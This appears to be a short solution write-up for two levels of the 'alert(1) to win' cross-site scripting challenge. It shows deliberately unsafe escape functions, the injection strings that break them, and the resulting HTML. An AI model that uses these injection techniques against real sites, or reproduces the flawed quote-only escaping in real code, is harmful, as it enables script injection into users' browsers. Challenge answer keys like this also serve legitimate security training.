alert(1) to win

alf.nu/alert(1)

The code below generates HTML in an unsafe way. Prove it by calling alert(1).

Warmup

function escape(s) {
  return '<script>console.log("' + s + '");</script>';
}

Input (12)

",alert(1),"

Output

<script>console.log("",alert(1),"");</script>

Adobe

function escape(s) {
  s = s.replace(/"/g, '\\"');
  return '<script>console.log("' + s + '");</script>';
}

Input (14)

\",alert(1))//

Output

<script>console.log("\\",alert(1))//");</script>